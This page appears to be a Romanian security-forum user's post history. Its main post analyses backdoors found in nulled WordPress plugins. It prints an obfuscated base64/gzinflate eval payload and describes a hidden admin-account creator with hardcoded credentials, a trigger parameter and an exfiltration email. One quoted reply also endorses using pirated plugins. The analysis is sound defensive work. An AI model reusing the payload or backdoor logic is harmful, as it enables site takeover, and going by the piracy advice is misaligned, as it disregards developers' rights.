Jump to content

Nest

Active Members
  • Posts

    94
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by Nest

  1. Ca si tehnici de mitigare am putea folosi urmatoarele abordari:

    • Blocarea bazei de date/tabelei pentru adaugarea de utilizatori:

      ALTER DATABASE <baza de date>
      SET READ_ONLY
      WITH NO_WAIT

      LOCK TABLES tabela WRITE;
      -- Dupa ce suntem siguri
      UNLOCK TABLES;

      Putem da lock la tabela cu utilizatori admini dupa ce ne-am creat unul.


    • Detectarea de base_64 este simpla(cautam un string in mod recursiv in sursa). Problema este a un algoritm de codare base_58 sau base_71 este foarte usor de implementat sub un nume diferit ca si functie. In acest caz am putea face cautarea dupa apelul functiei eval(). Aceasta ar acoperi majoritatea problemelor legate de decoarea si interpretarea unui string ca si cod php.
    • Am putea face un hook pe mailer daemon(toate apelurile sunt interceptate astfel). Urmatorul tutorial ne poate fi de folos:
      Redirecting functions in shared ELF libraries - CodeProject

    Problema cu acea comanda este ca blocheaza si utilizatorul curent la versiunile sub 3.2.1 ; desi nu cred ca o mai foloseste cineva, e bine de stiut.

  2. Pur si simplu cate un div pentru fiecare coloana (harta + text). Alignmentul il faci din CSS (harta in stanga, textul in dreapta), iar la text te folosesti de float.

    .harta {
    position: absolute;
    left: 0px;
    }

    Modifici cu left/right, si setezi pozitia fiecarui element.

  3. daca pune cineva codul ala php sau criptat intr-un plugin oarecare ,se formeaza un user "administrator" oricand pe site? coduri de genu se pot gasi si in temele wordpress sub o alta forma? intreb deoarece am 2 site-uri ce folosesc wordprees nullled

    Da, se pot gasi sub multe forme, deci iti recomand sa treci pe o tema gratuita.

    Bine ca iai informat pe toti . Si eu faceam chestia asta inainte (Am invatat dupa blogul lui tinkode:)) ).

    Nothing stays forever.

  4. Nu e neaparat nevoie sa o cumperi sau sa te feresti de nulled ca dracu' de tamaie.

    Iti iei frumos un plugin nulled sa zicem, il instalezi mai intai pe un server local, in PC sa vezi cum se comporta si daca functioneaza ca poate e varianta trial si e teapa.

    Daca merge asa cum te asteptai, atunci te apuci si iei la citit codul sa vezi ce face codul respectiv. Ce nu-ti convine, stergi. Ce e asa de greu ? Toata lumea stie ca temele/pluginurile nulled nu sunt clean dar asta nu inseamna ca nu ti le poti face tu singur clean. Stergi cateva linii de cod si nu mai dai $50 sau $70. Eu zic ca se merita.

    Keep it up, buna mentalitate ai.

  5. sitecheck.sucuri.net

    logo.png

    Acesta va scana websiteul pentru malware, injectii, spam si defaceuri. De asemenea colaboreaza cu motoarele anti-spam pentru a detecta daca site-ul este marcat ca si spam (in cazul in care cineva se foloseste de el pentru a trimite mailuri).

    De asemenea cei de la Sucuri ofera si un plugin de WordPress, care odata instalat ofera un firewall ce protejeaza impotriva vulnerabilitatilor cunoscute si o sectiune de "Last Logins" pentru a vedea cine s-a logat pe site.

    In plus, ofera si cateva utilitati post-hack, cum ar fi updatarea salturilor si resetarea parolelor tuturor utilizatorilor.

    Wordfence Security

    wordfence-security-blog1.jpg

    Acest plugin este destul de cunoscut. El scaneaza fisierele core, fiserele temelor si pluginurile impotriva unor vulnerabilitati cunoscute. De asemenea ofera un log unde se pot vedea toate actiunile ce au avut loc pe site.

    WP Changes Tracker / WP Security Audit Log

    WP-Security-Audit-Log-Plugin-Review-175x175.png

    Aceste doua pluginuri sunt exclusiv pentru vizualizarea logurilor, insa sunt cele mai avansate din aceasta categorie.

    Wemahu

    a3db2ae556901898d31026dd76f30fdf?d=mm&s=150&r=G

    Acest plugin se ocupa exclusiv cu verificarea impotriva backdoorurilor ale pluginurilor si temelor, detectand webshelluri, cod PHP obfuscat, code execution si altele.

    Anti-Malware

    GOTMLS-Anti-Malware.jpg

    Pe langa scanarea impotriva backdoorurilor si vulnerabilitatilor, acesta ofera si un sistem anti-bruteforce pentru pagina wp-login.php

    Cam asta a fost. Desi sunt o multime de resurse care va pot ajuta sa scapati de malware, nu inseamna ca puteti folosi chestii nulled in voie, niciodata nu va exista un plugin sau software cu o rata de detectie de 100%. RSS

  6. Cum am putea scana cele doua foldere din wordpress themes si plugins pentru eventuale base64 sau alte metode de obfuscare ?

    Am sa scriu azi un tutorial despre scanarea WordPress pentru backdoors.

    Ideal asa ar fi sa cumperi nu iau aparatrea pirateriei dar inca traim in lumea a 3-a cel putin la nivel european, unde la noi salariile sunt de 3 ori mai mici si mancarea de 3 ori mai scumpa deci...oricum cred ca toti am folosit vreodata sau folosim ceva nulled.

    Dupa cum am zis, daca nu ai o afacere sau macar un site din care sa poti scoate profit, nu ai nevoie de ceva platit. Alternative sunt peste tot, gratuite. Mai bine free dar sigur, decat nulled si sa te trezesti cu surprize. Sau iti construiesti, la fel ca si resursele free, tutoriale free exista chiar mai multe, pe langa faptul ca stii ce muncesti si iti faci cum vrei, mai si inveti ceva. Un incepator, pentru o tema de WordPress simpla, cam in 2 saptamani termina.

  7. Vad in ultima perioada o multime de lume intreband de chestii nulled, pentru ca totul e roz bombon cand vine vorba de Internet, stim cu totii. Am sa va arat cateva exemple sa vedeti ce va ofera pluginurile/temele/scripturile nulled, fata de versiunile oficiale:

    SEOPressor - Pret original: 47$ +

    Chestia asta e chiar de pe un site romanesc. Pluginul era instalat in directorul wp-content/plugins/seo-pressor(gratuit). Deja cuvantul "gratuit" forma o idee generala despre continutul directorului. Folosind un plugin de scan, s-a gasit urmatorul cod in site (seo-pressor(gratuit)/classes/central.class.php):

    eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
    iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
    5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );

    Dupa decriptare:

    cXq11vv.gif

    Deci, exista doua functii introduse in "wp_head" => sunt executate la fiecare incarcare de pagina.

    Prima functie, my_wpfunww7x(), creeaza un utilizator "wordpress" cu parola "gh67io9Cjm" cu permisiuni de administrator. Asta se intampla numai in cazul in care URLul paginii are parametrul "cms" de tip GET cu valoarea "jjoplmh". Ex: Success | .xyz Domain Names | Join Generation XYZ

    A doua, my_wpfunww7c8(), verifica daca exista utilizatorul. Daca nu, trimite un e-mail catre adresa "thomasasza@gmx.com", cu URLul blogului in subiect si "WordPress Plugin" in continut.

    Logica e simpla:

    1. Cand pluginul e instalat, imediat se trimite un e-mail la adresa celui care a introdus backdoorul (thomasasza@gmx.com)
    2. Acesta intra pe blog, si acceseaza ?cms=jjoplmh in URL.
    3. Prin accesarea acelui URL, se creeaza utilizatorul cu permisiuni de administrator. Acum el se poate loga pe blog ca si cand al lui si are acces la tot, ceea ce poate duce la lucruri mai grave, cum ar fi compromiterea intregului server.

    SEOPressor - Pret original: 42$ +

    Backdoorul se afla in fisierul: wp-content/restrict-content-pro/includes/sidebar.php - #8966576 - Pastie - daca va uitati atent, aproape tot codul este comentat, mai putin urmatoarea chestie:

    tE6F7Fs.gif

    Arata similar, nu? Singura diferenta dintre pluginul precedent este o functie numita diferit (my_wpfunww458, si adresa de e-mail, care decodata devine wordpresssslog@yandex.com

    Codul de sus se ocupa de partea de trimitere a e-mailului. Cel care creeaza utilizatorul cu drepturi de administrator se afla in fisierul wp-content/restrict-content-pro/includes/class.php - #8966599 - Pastie - aceeasi strategie, aproape tot codul comentat, mai putin:

    WWtYrmC.gif

    de data asta, folosindu-se de parametrul ?cms=go

    Si, in ultimul rand, modificarea fisierului wp-content/restrict-content-pro/restrict-content-pro.php pentru a executa cele doua comenzi:

    wp-content/restrict-content-pro/restrict-content-pro.php

    Si cam atat, ca e aproape 1 noaptea si deja mi-e somn. Nu luati chestii nulled, daca nu aveti buget inseamna ca nu aveti neaparata nevoie de ele si o alternativa gratuita este ceea ce va trebuie. www.sucuri.net @pr0fw3b think about it.

    • Upvote 1
  8. pt 45$ eu zic ca merita sa-ti cumperi o tema.

    gandestete cat timp a pierdut programatorul respectiv ca sa faca tema? ti-ar conveni sa patesti la fel?

    nu mi se pare Ok sa incurajati lumea sa foloseasca vers."nulled" decat sa le cumpere, mai ales ca nu costa o avere si mai ales ca daca voi folositi tema pentru un client e clar ca luati de la el cel putin dublul costului temei respective.

    romanul din ziua de azi numai dupa MOCA MOCA MOCA...TZEAPA TZEAPA TZEAPA...Sa ne imbogatim peste noapte...si lista continuaaaaaa

    themeforest.net

    45$ (faci magazin de haine, inseamna ca vei vinde=iti permiti sa dai 45$ pe site)

    Pai, oricum tot acolo se ajunge. Din postul lui initial reiese ca vrea ceva gratuit, deci, oricum le-ar fi gasit. Informatia e publica si raspandita destul incat nu are rost sa incerci sa o combati. Am avut si eu logouri si altele care au ajuns publice pe net dupa ce le-am vandut, si stiu senzatia.

    Poate, totusi, daca face asa si dupa ceva timp scoate bani din afacere, o sa o cumpere, realizand singur ca nu se compara versiunea nulled cu cea oficiala. Mai ales dupa ce o sa ii fie introdus un backdoor in site de "binevoitorul" care a uploadat acea versiune.

×
×
  • Create New...